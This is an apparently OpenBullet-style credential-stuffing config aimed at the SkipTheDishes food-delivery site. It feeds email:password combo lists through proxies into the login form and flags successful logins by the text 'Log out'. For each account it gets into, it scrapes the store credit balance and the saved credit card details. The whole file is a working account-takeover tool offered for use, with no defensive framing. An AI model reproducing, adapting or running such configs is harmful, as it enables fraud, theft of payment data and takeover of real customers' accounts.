[SETTINGS]
{
  "Name": "SkipTheDishes",
  "SuggestedBots": 50,
  "LastModified": "2018-07-10T00:21:20.6875554+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.skipthedishes.com/gift-cards/login?" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
REQUEST POST "https://www.skipthedishes.com/gift-cards/login?" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "referer: https://www.skipthedishes.com/gift-cards/login?" 
  HEADER "origin: https://www.skipthedishes.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "Log out" 
  KEYCHAIN Failure OR 
    KEY "Our system was unable to verify" 
REQUEST GET "https://www.skipthedishes.com/user/account/skip-credits" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "<div class=\"col-xs-12 credit-amount text-center margin-top-lg\">" "<" Recursive=FALSE -> CAP "CREDIT" "" "" 
REQUEST GET "https://www.skipthedishes.com/user/account/credit-cards/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "<strong>
" "                </s" Recursive=TRUE -> CAP "CARDS" "" "" 
